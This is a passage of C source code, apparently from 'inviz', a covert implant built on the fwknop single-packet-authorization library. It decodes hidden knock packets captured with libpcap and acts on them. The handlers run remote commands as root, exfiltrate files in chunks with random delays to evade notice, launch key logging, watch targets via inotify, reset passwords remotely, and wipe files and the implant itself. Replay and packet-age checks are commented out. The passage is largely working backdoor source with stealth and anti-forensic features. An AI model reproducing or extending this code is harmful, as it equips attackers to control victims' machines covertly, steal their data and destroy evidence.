            res = fko_new_with_data(&ctx, (char *)spa_pkt->packet_data, NULL);
            if(res != FKO_SUCCESS) {
                sprintf(logmsg, "unable to create fko context (before decryption) [%s]", fko_errstr(res));
                logit(_LOG_WARNING, logmsg, 0);
                return(SPA_MSG_FKO_CTX_ERROR);
            }
            //
            /* Set whatever GPG parameters we have.
            */
            if(this_access->gpg_home_dir != NULL) {
                res = fko_set_gpg_home_dir(ctx, this_access->gpg_home_dir);
                if(res != FKO_SUCCESS) {
                    sprintf(logmsg, "unable to set GPG keyring path to %s [%s]",
                            this_access->gpg_home_dir, fko_errstr(res));
                    logit(_LOG_WARNING, logmsg, 0);
                    return(SPA_MSG_FKO_CTX_ERROR);
                }
            }

            if(this_access->gpg_decrypt_id != NULL) {
                fko_set_gpg_recipient(ctx, this_access->gpg_decrypt_id);
            }
            //
            /* If GPG_REQUIRE_SIG is set for this acc stanza, then set
             * the FKO context accordingly and check the other GPG Sig-
             * related parameters. This also applies when REMOTE_ID is
             * set.
            */
            if(this_access->gpg_require_sig) {
                fko_set_gpg_signature_verify(ctx, 1);
                //
                /* Set whether or not to ignore signature verification errors.
                */
                fko_set_gpg_ignore_verify_error(ctx, this_access->gpg_ignore_sig_error);
            } else {
                fko_set_gpg_signature_verify(ctx, 0);
                fko_set_gpg_ignore_verify_error(ctx, 1);
            }

            /* Now decrypt the data.
            */
            res = fko_decrypt_spa_data(ctx, this_access->gpg_decrypt_pw);
        } else {
            logit(_LOG_ERROR, "no GPG_DECRYPT_PW for GPG encrypted messages", 0);
            return(SPA_MSG_FKO_CTX_ERROR);
        }
    } else {
        sprintf(logmsg, "unable to determine encryption type (%i)", enc_type);
        logit(_LOG_ERROR, logmsg, 0);
        return(SPA_MSG_FKO_CTX_ERROR);
    }
    //
    /* Do we have a valid FKO context?
    */
    if(res != FKO_SUCCESS) {
        sprintf(logmsg, "unable to create fko context [%s]", fko_errstr(res));
        logit(_LOG_WARNING, logmsg, 0);
        if(IS_GPG_ERROR(res)) {
            sprintf(logmsg, "GPG error [%s]", fko_gpg_errstr(ctx));
            logit(_LOG_WARNING, logmsg, 0);
        }
        goto clean_and_bail;
    }
    //
    /* At this point, we assume the SPA data is valid.  Now we need to see
     * if it meets our access criteria.
    */
    if(get_verbose() > 2) {
        sprintf(logmsg, "port knocking packet decode (res=%i):\n%s", res, dump_ctx_inviz(ctx));
        logit(_LOG_INFO, logmsg, 0);
    }
    //
    /* First, if this is a GPG message, and GPG_REMOTE_ID list is not empty,
     * then we need to make sure this incoming message is signer ID matches
     * an entry in the list.
    */
    if(enc_type == FKO_ENCRYPTION_GPG && this_access->gpg_require_sig) {
        res = fko_get_gpg_signature_id(ctx, &gpg_id);
        if(res != FKO_SUCCESS) {
            sprintf(logmsg, "error pulling the GPG signature ID from the context [%s]",
                fko_gpg_errstr(ctx));
            logit(_LOG_WARNING, logmsg, 0);
            goto clean_and_bail;
        }

        if(get_verbose()) {
            sprintf(logmsg, "incoming port knocking data signed (by %s)", gpg_id);
            logit(_LOG_INFO, logmsg, 0);
        }

        if( (this_access->gpg_remote_id != NULL) && (!acc_check_gpg_remote_id_inviz(this_access, gpg_id)) ) {
            sprintf(logmsg, "incoming port knocking packet signed by ID (%s), but that ID is not in the GPG_REMOTE_ID list",
                    gpg_id);
            logit(_LOG_WARNING, logmsg, 0);
            goto clean_and_bail;
        }
    }
    //
    /* Check for replays if so configured.
    */
    //if(strncasecmp(opts->config[CONF_ENABLE_DIGEST_PERSISTENCE], "Y", 1) == 0) {
    //    res = replay_check_inviz(ctx);
    //    if(res != 0) {
    //        /* non-zero means we have seen this packet before. */
    //        goto clean_and_bail;
    //    }
    //}
    //
    /* Populate our spa data struct for future reference.
    */
    res = get_spa_data_fields_inviz(ctx, &spadat);
    //
    /* Figure out what our timeout will be. If it is specified in the SPA
     * data, then use that.  If not, try the FW_ACCESS_TIMEOUT from the
     * access.conf file (if there is one).  Otherwise use the default.
    */
    if(spadat.client_timeout > 0) {
        spadat.fw_access_timeout = spadat.client_timeout;
    } else if(this_access->fw_access_timeout > 0) {
        spadat.fw_access_timeout = this_access->fw_access_timeout;
    } else {
        spadat.fw_access_timeout = DEF_FW_ACCESS_TIMEOUT;
    }
    if(res != FKO_SUCCESS) {
        sprintf(logmsg, "unexpected error pulling port knocking data from context [%s]",
                fko_errstr(res));
        logit(_LOG_ERROR, logmsg, 0);
        res = SPA_MSG_ERROR;
        goto clean_and_bail;
    }
    //
    /* Check packet age if so configured.
    */
    //if(strncasecmp(opts->config[CONF_ENABLE_SPA_PACKET_AGING], "Y", 1) == 0) {
    //    time(&now_ts);
    //    ts_diff = now_ts - spadat.timestamp;
    //    if(ts_diff > atoi(opts->config[CONF_MAX_SPA_PACKET_AGE])) {
    //        sprintf(logmsg, "SPA data is too old (%i seconds)", ts_diff);
    //        logit(_LOG_WARNING, logmsg, 0);
    //        res = SPA_MSG_TOO_OLD;
    //        goto clean_and_bail;
    //    }
    //}
    //
    /* At this point, we have enough to check the embedded (or packet source)
     * IP address against the defined access rights.  We start by splitting
     * the spa msg source IP from the remainder of the message.
    */
    spa_ip_demark = strchr(spadat.spa_message, ',');
    if(spa_ip_demark == NULL) {
        sprintf(logmsg, "error parsing port knocking message string [%s]",
                fko_errstr(res));
        logit(_LOG_WARNING, logmsg, 0);
        res = SPA_MSG_ERROR;
        goto clean_and_bail;
    }

    strlcpy(spadat.spa_message_src_ip, spadat.spa_message, (spa_ip_demark-spadat.spa_message)+1);
    strlcpy(spadat.spa_message_remain, spa_ip_demark+1, INVIZ_MAX_PKCOMMAND_LEN);
    //
    /* If use source IP was requested (embedded IP of 0.0.0.0), make sure it
     * is allowed.
    */
    if(strcmp(spadat.spa_message_src_ip, "0.0.0.0") == 0) {
        if(this_access->require_source_address) {
            sprintf(logmsg, "got 0.0.0.0 when valid source IP was required");
            logit(_LOG_WARNING, logmsg, 0);
            res = SPA_MSG_ACCESS_DENIED;
            goto clean_and_bail;
        }
        spadat.use_src_ip = spadat.pkt_source_ip;
    } else {
        spadat.use_src_ip = spadat.spa_message_src_ip;
    }
    set_pkclient(spadat.use_src_ip, strlen(spadat.use_src_ip));
    //
    /* If REQUIRE_USERNAME is set, make sure the username in this SPA data
     * matches.
    */
    if(this_access->require_username != NULL) {
        if(strcmp(spadat.username, this_access->require_username) != 0) {
            sprintf(logmsg, "username in port knocking data (%s) does not match required username (%s)",
                spadat.username, this_access->require_username);
            logit(_LOG_WARNING, logmsg, 0);
            res = SPA_MSG_ACCESS_DENIED;
            goto clean_and_bail;
        }
    }
    //
    /* Take action based on SPA message type.  */
    //
    /* Command messages.
    */
    if(spadat.message_type == FKO_COMMAND_MSG) {
        if( (get_pktype() != INVIZ_PKTYPE_COMMAND) && (get_pktype() != INVIZ_PKTYPE_ANY) ) {
            logit(_LOG_WARNING, "command message not allowed in the current configuration", 0);
            res = SPA_MSG_COMMAND_ERROR;
        } else {
            if (get_verbose()) {
                sprintf(logmsg, "processing incoming command message from %s",
                    spadat.pkt_source_ip);
                logit(_LOG_INFO, logmsg, 0);
            }
            //
            /* Do we need to become another user? If so, we call
             * run_extcmd_as and pass the cmd_exec_uid.
            */
            if( (this_access->cmd_exec_user != NULL) &&
                    (strncasecmp(this_access->cmd_exec_user, "root", 4) != 0) ) {
                if(get_verbose()) {
                    sprintf(logmsg, "setting effective user to %s (UID=%i) before running command",
                        this_access->cmd_exec_user, this_access->cmd_exec_uid);
                    logit(_LOG_INFO, logmsg, 0);
                }
                res = run_extcmd_inviz(this_access->cmd_exec_uid, spadat.spa_message_remain, NULL, 0, 0);
            } else {
                /* Just run it as we are (root that is). */
                res = run_extcmd_inviz(0, spadat.spa_message_remain, NULL, 0, 5);
            }
            //
            /* --DSS XXX: I have found that the status (and res for that
             *            matter) have been unreliable indicators of the
             *            actual exit status of some commands.  Not sure
             *            why yet.  For now, we will take what we get.
            */
            status = WEXITSTATUS(res);
            //
            if(get_verbose() > 2) {
                sprintf(logmsg, "CMD_EXEC: command returned %i", status);
                logit(_LOG_INFO, logmsg, 0);
            }

            if(status != 0) {
                res = SPA_MSG_COMMAND_ERROR;
            }
        }
        goto clean_and_bail;
    } else if (spadat.message_type == FKO_TRANSFER_MSG) {
        if( (get_pktype() != INVIZ_PKTYPE_TRANSFER) && (get_pktype() != INVIZ_PKTYPE_ANY) ) {
            logit(_LOG_WARNING, "file transfer message not allowed in the current configuration", 0);
            res = SPA_MSG_TRANSFER_ERROR;
        } else {
            if (get_verbose()) {
                sprintf(logmsg, "processing incoming file transfer message from %s",
                    spadat.pkt_source_ip);
                logit(_LOG_INFO, logmsg, 0);
            }
            //
            res = decon_transfercommand((const char *)spadat.spa_message_remain);
            if (res) {
                goto clean_and_bail;
            }
            //
            if (get_mode() == INVIZ_MODE_SENDER_LISTENING) {
                if (get_ipackets() == 0) {
                    //
                    // first packet received
                    //
                    if (get_pfile()) {
                        fclose(get_pfile());
                        set_pfile(NULL);
                    }
                    if (get_append()) {
                        // file received is to be added to existing file
                        set_pfile(fopen(get_filename(), "ab"));
                    } else {
                        // file received is to be over-written
                        set_pfile(fopen(get_filename(), "wb"));
                    }
                    if (get_pfile() == NULL) {
                        sprintf(logmsg, "unable to open file (%s) for writing [%s]",
                                get_filename(),
                                strerror(errno));
                        logit(_LOG_ERROR, logmsg, 0);
                        goto clean_and_bail;
                    }
                    set_started(TRUE);
                    set_finished(FALSE);
                    set_filedone(0);
                    set_filesize(0); // unknown at start
                }
                if (get_started() && !get_finished() &&
                        (spadat.spa_message_remain[0] == (char)INVIZ_EOF_CHAR)) {
                    int ndx = strlen(spadat.spa_message_remain);
                    int eof_match = TRUE;
                    for (res=1; res<ndx; res++) {
                        if (spadat.spa_message_remain[res] != (char)INVIZ_EOF_CHAR) {
                            eof_match = FALSE;
                            break;
                        }
                    }
                    if (eof_match) {
                        //
                        // here is eof indicator packet
                        //
                        fclose(get_pfile());
                        set_pfile(NULL);
                        set_finished(TRUE);
                        if (get_verbose()) {
                            sprintf(logmsg, "file transfer completed and saved to %s",
                                get_filename());
                            logit(_LOG_INFO, logmsg, 0);
                        }
                        goto clean_and_bail;
                    }
                } else if (get_started() && get_finished()) {
                    //
                    // here is trailing validation/last packet
                    //
                    set_filesize(atol(spadat.spa_message_remain));
                    if (get_filesize() == get_filedone()) {
                        sprintf(logmsg, "file transfer successful (%.0lf bytes)",
                                (double)get_filesize());
                        logit(_LOG_INFO, logmsg, 0);
                    } else {
                        sprintf(logmsg, "file transfer success uncertain (%.0lf of %.0f expected bytes)",
                                (double)get_filedone(),
                                (double)get_filesize());
                        logit(_LOG_INFO, logmsg, 0);
                    }
                    sig_interrupted = TRUE;
                    goto clean_and_bail;
                }
                int ndx;
                for (ndx=0; get_started() && !get_finished() &&
                        (ndx < strlen(spadat.spa_message_remain)); ndx++) {
                    //fputc(output ...
                    fprintf(get_pfile(), "%c", (char)spadat.spa_message_remain[ndx]);
                    fflush(get_pfile());
                }
                set_filedone(get_filedone() + ndx);
                goto clean_and_bail;
            }
            //
            // sender/client side of file transfer
            //
            memset(targetname, 0, sizeof(targetname));
            strlcpy(targetname, get_pkclient(), (int)NI_MAXHOST);
            if (strlen(targetname) > 0) {
                res = resolve_addr((struct sockaddr*)&remote, targetname);
                if (res) {
                    sprintf(logmsg, "unable to resolve %s address for file transfer [%s]",
                            targetname,
                            strerror(errno));
                    goto clean_and_bail;
                }
            }
            set_destinationip(get_pkclient(), strlen(get_pkclient()));
            //
            long lfilesize;
            set_pfile( fopen(get_transfertarget(), "rb") ); // read, binary
            if (get_pfile() == NULL ) {
                sprintf(logmsg, "unable to open file (%s) for transfer [%s]",
                    get_transfertarget(),
                    strerror(errno));
                logit(_LOG_ERROR, logmsg, 0);
                res = SPA_MSG_TRANSFER_ERROR;
                goto clean_and_bail;
            }
            //
            fseek(get_pfile(), 0, SEEK_END);
            if (ferror(get_pfile())) {
                sprintf(logmsg, "unable to read file (%s) to be transferred [%s]",
                        get_transfertarget(),
                        strerror(errno));
                logit(_LOG_ERROR, logmsg, 0);
                fclose(get_pfile());
                set_pfile(NULL);
                res = SPA_MSG_TRANSFER_ERROR;
                goto clean_and_bail;
            } else {
                lfilesize = ftell(get_pfile());
                set_filesize(lfilesize);
                set_filedone(0);
                set_filename(get_transfertarget(), strlen(get_transfertarget()));
                set_duplicates(FALSE);
                set_packetdestport( get_pktransferdestport() );
                set_packetsrcport( get_pktransfersrcport() );
            }
            rewind(get_pfile()); // position back at start
            set_ipackets(0);
            set_ipacketstodo((int)((lfilesize / (INVIZ_DEFAULT_PKTRANSFER_BUFFER_LEN * 1.0)) + 0.99));
            char ch;
            int ndx = 0;
            int sleep_seconds = 0;
            int send_buffer[INVIZ_DEFAULT_PKTRANSFER_BUFFER_LEN+1];
            while( !sig_interrupted && ((ch=fgetc(get_pfile())) != EOF) ) {
                //
                send_buffer[ndx++] = (int)ch;
                if (ndx == INVIZ_DEFAULT_PKTRANSFER_BUFFER_LEN) {
                    send_buffer[ndx] = '\0';
                    //
                    // now send this chunk back to client
                    //
                    res = push_packet(FKO_TRANSFER_MSG, (int *)send_buffer, ndx, TRUE, &remote, &local);
                    if (res == 0) {
                        ndx = 0;
                        inc_ipackets();
                    } else {
                        ndx = 0;
                        break;
                    }
                    sleep_seconds = (rand() % (get_sleepmax() - get_minsleepmax())) + get_minsleepmax();
                    if (sleep_seconds > 0) {
                        //
                        // pause between packets sent out
                        //
                        sleep( sleep_seconds );
                    }
                }
            }
            fclose(get_pfile());
            set_pfile(NULL);
            if (!sig_interrupted && (ndx > 0)) {
                send_buffer[ndx] = '\0';
                //
                // send this final chunk too
                //
                res = push_packet(FKO_TRANSFER_MSG, (int *)send_buffer, ndx, TRUE, &remote, &local);
                if (res == 0) {
                    inc_ipackets();
                }
            }
            if (res == 0) {
                sprintf(logmsg, "%s file transfer successful (%.0lf of %.0lf bytes)",
                        get_filename(),
                        (double)get_filedone(),
                        (double)get_filesize());
                logit(_LOG_INFO, logmsg, 0);
                //
                // now send eof packet
                //
                ndx = (INVIZ_DEFAULT_PKTRANSFER_BUFFER_LEN+1);
                for (res=0; res<ndx; res++) {
                    send_buffer[res] = INVIZ_EOF_CHAR;
                }
                send_buffer[ndx] = '\0';
                res = push_packet(FKO_TRANSFER_MSG, (int *)send_buffer, ndx, FALSE, &remote, &local);
                //
                // followed by validation packet
                //
                ndx = (INVIZ_DEFAULT_PKTRANSFER_BUFFER_LEN+1);
                for (res=0; res<ndx; res++) {
                    send_buffer[res] = 0x0;
                }
                ndx = 0;
                char fstr[32];
                memset(fstr, 0x0, 32);
                sprintf(fstr, "%.0lf", (double)get_filesize());
                int ii;
                for (ii=0; ii<strlen(fstr); ii++) {
                    send_buffer[ndx++] = fstr[ii];
                }
                res = push_packet(FKO_TRANSFER_MSG, (int *)send_buffer, ndx, FALSE, &remote, &local);
                //
                if (get_transferremove() || get_transfererase()) {
                    //
                    // now erase/remove transferred file
                    //
                    res = wipe_file(get_filename());
                }
                //
                if (get_transferwipe()) {
                    //
                    // now wipe self and die
                    //
                    res = wipe_self();
                    sig_interrupted = TRUE;
                }
            } else {
                sprintf(logmsg, "%s file transfer unsuccessful (%.0lf of %.0lf bytes)",
                        get_filename(),
                        (double)get_filedone(),
                        (double)get_filesize());
                logit(_LOG_WARNING, logmsg, 0);
            }
        }
        goto clean_and_bail;
    } else if (spadat.message_type == FKO_INOTIFY_MSG) {
        if( (get_pktype() != INVIZ_PKTYPE_INOTIFY) && (get_pktype() != INVIZ_PKTYPE_ANY) ) {
            logit(_LOG_WARNING, "inotify message not allowed in the current configuration", 0);
            res = SPA_MSG_INOTIFY_ERROR;
        } else {
            if (get_verbose()) {
                sprintf(logmsg, "processing incoming inotify message from %s",
                    spadat.pkt_source_ip);
                logit(_LOG_INFO, logmsg, 0);
            }
            unsigned int lv = ev_linux_version();
            if (lv < 0x020619) {
                if (lv == 0) {
                    sprintf(logmsg, "unable to run inotify on non-Linux kernels");
                } else {
                    sprintf(logmsg, "unable to run inotify on Linux kernels < 2.6.25 [%d]", lv);
                }
                logit(_LOG_ERROR, logmsg, 0);
                res = SPA_MSG_INOTIFY_ERROR;
                goto clean_and_bail;
            }
            //
            res = decon_inotifycommand((const char *)spadat.spa_message_remain);
            if (res) {
                goto clean_and_bail;
            }
            //
#if defined (IN_CLOEXEC) && defined (IN_NONBLOCK)
            if (get_inotifynonblocking()) {
                fd = inotify_init1(IN_CLOEXEC | IN_NONBLOCK);
            } else {
                fd = inotify_init1(IN_CLOEXEC);
            }
#else
            fd = inotify_init();
#endif
            //
            if (fd < 0) {
                sprintf(logmsg, "inotify_init error [%s]", strerror(errno));
                logit(_LOG_ERROR, logmsg, 0);
                res = SPA_MSG_INOTIFY_ERROR;
                goto clean_and_bail;
            } else {
                set_inotifyfd(fd);
            }
            //
            uint32_t watchmask = INVIZ_DEFAULT_PKINOTIFY_EVENTS;
            if (get_inotifyonce()) {
                watchmask = (watchmask || IN_ONESHOT);
            }
            wd = inotify_add_watch(fd, (char *)get_inotifytarget(), watchmask);
            if (wd < 0) {
                sprintf(logmsg, "inotify_add_watch error [%s]", strerror(errno));
                logit(_LOG_ERROR, logmsg, 0);
                res = SPA_MSG_INOTIFY_ERROR;
                close(fd);
                goto clean_and_bail;
            } else {
                //
                // currently only supporting 1 inotify watch target
                // but multiple targets would be possible if wd is saved
                // in different manner than this
                //
                set_inotifywd(wd); // watch descriptor
            }
            //
        }
        goto clean_and_bail;
    } else if (spadat.message_type == FKO_KEYLOG_MSG) {
        if( (get_pktype() != INVIZ_PKTYPE_KEYLOG) && (get_pktype() != INVIZ_PKTYPE_ANY) ) {
            logit(_LOG_WARNING, "key logging message not allowed in the current configuration", 0);
            res = SPA_MSG_KEYLOG_ERROR;
        } else {
            if (get_verbose()) {
                sprintf(logmsg, "processing incoming key logging message from %s",
                    spadat.pkt_source_ip);
                logit(_LOG_INFO, logmsg, 0);
            }
            //
            /* Do we need to become another user? If so, we call
             * run_extcmd_as and pass the cmd_exec_uid.
            */
            if( (this_access->cmd_exec_user != NULL) &&
                    (strncasecmp(this_access->cmd_exec_user, "root", 4) != 0) ) {
                if(get_verbose()) {
                    sprintf(logmsg, "setting effective user to %s (UID=%i) before running key logging",
                        this_access->cmd_exec_user, this_access->cmd_exec_uid);
                    logit(_LOG_INFO, logmsg, 0);
                }
                res = run_extcmd_inviz(this_access->cmd_exec_uid, spadat.spa_message_remain, NULL, 0, 0);
            } else {
                /* Just run it as we are (root that is). */
                res = run_extcmd_inviz(0, spadat.spa_message_remain, NULL, 0, 5);
            }
            //
            //
            status = WEXITSTATUS(res);
            //
            if(get_verbose() > 2) {
                sprintf(logmsg, "exec key logging returned %i", status);
                logit(_LOG_INFO, logmsg, 0);
            }

            if(status != 0) {
                res = SPA_MSG_KEYLOG_ERROR;
            }
        }
        goto clean_and_bail;
    } else if (spadat.message_type == FKO_WIPE_MSG) {
        if( (get_pktype() != INVIZ_PKTYPE_WIPE) && (get_pktype() != INVIZ_PKTYPE_ANY) ) {
            logit(_LOG_WARNING, "wipe message not allowed in the current configuration", 0);
            res = SPA_MSG_WIPE_ERROR;
        } else {
            if (get_verbose()) {
                sprintf(logmsg, "processing incoming wipe message from %s",
                    spadat.pkt_source_ip);
                logit(_LOG_INFO, logmsg, 0);
            }
            //
            res = decon_wipecommand((const char *)spadat.spa_message_remain);
            if (res) {
                goto clean_and_bail;
            }
            //
            if ( (strlen(get_wipetarget()) == strlen(INVIZ_SELF_DESC)) &&
                    (strncmp(INVIZ_SELF_DESC, get_wipetarget(), strlen(INVIZ_SELF_DESC)) == 0) ) {
                //
                res = wipe_self();
                //
                // assume program is to be killed after wiping self
                //
                sig_interrupted = TRUE;
            } else {
                //
                // wipe something else
                //
                if (wipefile(get_wipetarget(), get_iwipetimes()) == EXIT_SUCCESS) {
                    sprintf(logmsg, "file %s now wiped and deleted from disk",
                            get_wipetarget());
                    logit(_LOG_INFO, logmsg, 0);
                } else {
                    sprintf(logmsg, "unable to wipe file %s from disk",
                            get_wipetarget());
                    logit(_LOG_WARNING, logmsg, 0);
                    res = SPA_MSG_WIPE_ERROR;
                }
            }
        }
        goto clean_and_bail;
    } else if (spadat.message_type == FKO_BEACON_MSG) {
        if( (get_pktype() != INVIZ_PKTYPE_BEACON) && (get_pktype() != INVIZ_PKTYPE_ANY) ) {
            logit(_LOG_WARNING, "beacon message not allowed in the current configuration", 0);
            res = SPA_MSG_BEACON_ERROR;
        } else {
            if (get_verbose()) {
                sprintf(logmsg, "processing incoming beacon message from %s",
                    spadat.pkt_source_ip);
                logit(_LOG_INFO, logmsg, 0);
            }
            //
            res = decon_beaconcommand((const char *)spadat.spa_message_remain);
            if (res) {
                goto clean_and_bail;
            }
            //
        }
        goto clean_and_bail;
    } else if (spadat.message_type == FKO_PASS_MSG) {
        if( (get_pktype() != INVIZ_PKTYPE_PASS) && (get_pktype() != INVIZ_PKTYPE_ANY) ) {
            logit(_LOG_WARNING, "password message not allowed in the current configuration", 0);
            res = SPA_MSG_PASS_ERROR;
        } else {
            if (get_verbose()) {
                sprintf(logmsg, "processing incoming password message from %s",
                    spadat.pkt_source_ip);
                logit(_LOG_INFO, logmsg, 0);
            }
            //
            //
            //
            set_pkpassword(spadat.spa_message_remain, strlen(spadat.spa_message_remain));
            memset(this_access->key, 0x0, INVIZ_MAX_PASSWORD_LEN+1);
            strncpy(this_access->key, (char *)get_pkpassword(), strlen(get_pkpassword()));
            //
            if (strncmp(spadat.spa_message_remain, get_pkpassword(), strlen(spadat.spa_message_remain)) == 0) {
                sprintf(logmsg, "password reset from %s successful", get_pkclient());
                logit(_LOG_INFO, logmsg, 0);
            } else {
                sprintf(logmsg, "password reset from %s not successful", get_pkclient());
                logit(_LOG_ERROR, logmsg, 0);
            }
        }
        goto clean_and_bail;
    }
    //
    /* From this point forward, we have some kind of access message. So
     * we first see if access is allowed by checking access against
     * restrict_ports and open_ports.
     *
     *  --DSS TODO: We should add BLACKLIST support here as well.
    */
    if(get_usepkaccessfile() && !acc_check_port_access_inviz(this_access, spadat.spa_message_remain)) {
        logit(_LOG_WARNING, "one or more requested protocol/ports was denied per access.conf", 0);
        res = SPA_MSG_ACCESS_DENIED;
        goto clean_and_bail;
    }
    //
    /* At this point, we can process the SPA request.
    */
    res = process_spa_request_inviz(&spadat);
//
clean_and_bail:
//
    if(ctx != NULL) {
        fko_destroy(ctx);
        ctx = NULL;
    }
    return(res);
}
//
// process libpcap incoming packet
//
void
process_packet_inviz(unsigned char *args, const struct pcap_pkthdr *packet_header, const unsigned char *packet) {
    struct ether_header *eth_p;
    struct iphdr        *iph_p;
    struct tcphdr       *tcph_p;
    struct udphdr       *udph_p;

    unsigned char       *pkt_data;
    unsigned short      pkt_data_len;
    unsigned char       *pkt_end;

    unsigned int        ip_hdr_words;

    unsigned int        src_ip;
    unsigned int        dest_ip;

    unsigned short      src_port;
    unsigned short      dest_port;

    unsigned short      eth_type;

    //fko_srv_options_t   *opts = (fko_srv_options_t *)args;

    int                 offset = get_datalinkoffset();

    unsigned short      pkt_len = packet_header->len;

    /* This is a hack to determine if we are using the linux cooked
     * interface.  We base it on the offset being 16 which is the
     * value it would be if the datalink is DLT_LINUX_SLL.  I don't
     * know if this is the correct way to do this, but it seems to work.
    */
    unsigned char       assume_cooked = (offset == 16 ? 1 : 0);

    /* Determine packet end.
    */
    pkt_end = (unsigned char *) packet + packet_header->caplen;

    /* The ethernet header.
    */
    eth_p = (struct ether_header*) packet;

    /* Gotta have a complete ethernet header.
    */
    if (packet_header->caplen < ETHER_HDR_LEN)
        return;

    eth_type = ntohs(*((unsigned short*)&eth_p->ether_type));

    if(eth_type == 0x8100) {
        /* 802.1q encapsulated */
        offset += 4;
        eth_type = ntohs(*(((unsigned short*)&eth_p->ether_type)+2));
    }

    /* When using libpcap, pkthdr->len for 802.3 frames include CRC_LEN,
     * but Ethenet_II frames do not.
    */
    if (eth_type > 1500 || assume_cooked == 1) {
        pkt_len += ETHER_CRC_LEN;

        if(eth_type == 0xAAAA) {
            /* 802.2 SNAP */
            offset += 5;
        }
    } else {
        /* 802.3 Frame */
        offset += 3;
    }
    //
    /* Make sure the packet length is still valid.
    */
    if (! ETHER_IS_VALID_LEN(pkt_len) ) {
        return;
    }
    //
    /* Pull the IP header.
    */
    iph_p = (struct iphdr *)(packet + offset);
    //
    /* If IP header is past calculated packet end, bail.
    */
    if ((unsigned char *)(iph_p + 1) > pkt_end) {
        return;
    }
    //
    /* ip_hdr_words is the number of 32 bit words in the IP header. After
     * masking of the IPV4 version bits, the number *must* be at least
     * 5, even without options.
    */
    ip_hdr_words = (iph_p->ihl & IPV4_VER_MASK);

    if (ip_hdr_words < MIN_IPV4_WORDS) {
        return;
    }
    //
    /* Now, find the packet data payload (depending on IPPROTO).
    */
    src_ip  = iph_p->saddr;
    dest_ip = iph_p->daddr;

    if (iph_p->protocol == IPPROTO_TCP) {
        //
        /* Process TCP packet
        */
        tcph_p = (struct tcphdr *)((unsigned char*)iph_p + (ip_hdr_words << 2));

        src_port  = ntohs(tcph_p->source);
        dest_port = ntohs(tcph_p->dest);

        pkt_data = ((unsigned char *)(tcph_p+1))+((tcph_p->doff)<<2)-sizeof(struct tcphdr);

        pkt_data_len = (pkt_end-(unsigned char*)iph_p)-(pkt_data-(unsigned char*)iph_p);
    } else if (iph_p->protocol == IPPROTO_UDP) {
        //
        /* Process UDP packet
        */
        udph_p = (struct udphdr *)((unsigned char*)iph_p + (ip_hdr_words << 2));

        src_port  = ntohs(udph_p->source);
        dest_port = ntohs(udph_p->dest);

        pkt_data = ((unsigned char *)(udph_p + 1));
        pkt_data_len = (pkt_end-(unsigned char*)iph_p)-(pkt_data-(unsigned char*)iph_p);
    } else {
        return;
    }
    //
    /*
     * Now we have data. For now, we are not checking IP or port values. We
     * are relying on the pcap filter. This may change so we do retain the IP
     * addresses and ports just in case. We just go ahead and queue the
     * data.
    */
    //
    /* Truncate the data if it is too long.  This most likely means it is not
     * a valid SPA packet anyway.
    */
    if(pkt_data_len > MAX_SPA_PACKET_LEN) {
        pkt_data_len = MAX_SPA_PACKET_LEN;
    }
    //
    /* Put the data in our 1-entry queue.
    */
    set_spapacketdata((char *)pkt_data, pkt_data_len);
    set_spapacketsourceip(src_ip);
    set_spapacketdestinationport(dest_port);
    //
    return;
}
//
// do_inotify_watch()
//
void
do_inotify_watch(int fd) {
    //
    char buf[EV_INOTIFY_BUFSIZE];
    char logmsg[512];
    char titem[MAX_FILENAME_LEN]; // target item name
    int ofs;
    int len;
    int watch_aborted = FALSE;
    sprintf(logmsg, "inotify %s event watching started", (char *)get_inotifytarget());
    logit(_LOG_INFO, logmsg, 0);
    FILE *pLog = NULL;
    if (get_inotifylog() && (strlen(get_inotifylog()) > 0)) {
        pLog = fopen((char *)get_inotifylog(), "a"); // append if existing
        if (pLog == NULL) {
            sprintf(logmsg, "unable to open inotify log file (%s)", (char *)get_inotifylog());
            logit(_LOG_WARNING, logmsg, 0);
            set_inotifylog(FALSE);
        } else {
            sprintf(logmsg, "inotify %s event watching started", (char *)get_inotifytarget());
            logfileit(_LOG_INFO, logmsg, pLog, 1);
        }
    }
    while (!sig_interrupted && !watch_aborted) {
        //
        len = read(fd, buf, sizeof(buf));
        //
        if (len == -1) {
            if (errno == EAGAIN) {
                if (!get_inotifynonblocking()) {
                    continue; // try again
                }
                sprintf(logmsg, "inotify event watcher fd marked as non-blocking");
                logit(_LOG_ERROR, logmsg, 0);
                return;
            } else {
                sprintf(logmsg, "inotify event watcher read error [%s]", strerror(errno));
                logit(_LOG_ERROR, logmsg, 0);
                return;
            }
        }
        for (ofs = 0; ofs < len; ) {
            struct inotify_event *ev = (struct inotify_event *)(buf + ofs);
            //infy_wd (EV_A_ ev->wd, ev->wd, ev);
            if (ev->len) {
                inc_inotifyevents(); // count events
                memset(titem, 0x0, sizeof(titem));
                sprintf(titem, "%s", ev->name);
                if (ev->mask & IN_CREATE) {
                    if (ev->mask & IN_ISDIR) {
                        sprintf(logmsg, "(sub)directory %s created", titem);
                    } else {
                        sprintf(logmsg, "(sub)file %s created", titem);
                    }
                } else if (ev->mask & IN_DELETE) {
                    if (ev->mask & IN_ISDIR) {
                        sprintf(logmsg, "(sub)directory %s deleted", titem);
                    } else {
                        sprintf(logmsg, "(sub)file %s deleted", titem);
                    }
                } else if (ev->mask & IN_DELETE_SELF) {
                    if (ev->mask & IN_ISDIR) {
                        sprintf(logmsg, "directory %s (self) deleted", titem);
                    } else {
                        sprintf(logmsg, "file %s (self) deleted", titem);
                    }
                } else if (ev->mask & IN_MODIFY) {
                    if (ev->mask & IN_ISDIR) {
                        sprintf(logmsg, "directory %s changed", titem);
                    } else {
                        sprintf(logmsg, "file %s changed", titem);
                    }
                } else if (ev->mask & IN_ATTRIB) {
                    if (ev->mask & IN_ISDIR) {
                        sprintf(logmsg, "directory %s attribute(s) changed", titem);
                    } else {
                        sprintf(logmsg, "file %s attribute(s) changed", titem);
                    }
                } else if (ev->mask & IN_OPEN) {
                    if (ev->mask & IN_ISDIR) {
                        sprintf(logmsg, "directory %s opened", titem);
                    } else {
                        sprintf(logmsg, "file %s opened", titem);
                    }
                } else if (ev->mask & IN_CLOSE_WRITE) {
                    if (ev->mask & IN_ISDIR) {
                        sprintf(logmsg, "writable directory %s closed", titem);
                    } else {
                        sprintf(logmsg, "writable file %s closed", titem);
                    }
                } else if (ev->mask & IN_CLOSE_NOWRITE) {
                    if (ev->mask & IN_ISDIR) {
                        sprintf(logmsg, "non-writable directory %s closed", titem);
                    } else {
                        sprintf(logmsg, "non-writable file %s closed", titem);
                    }
                } else if (ev->mask & IN_ACCESS) {
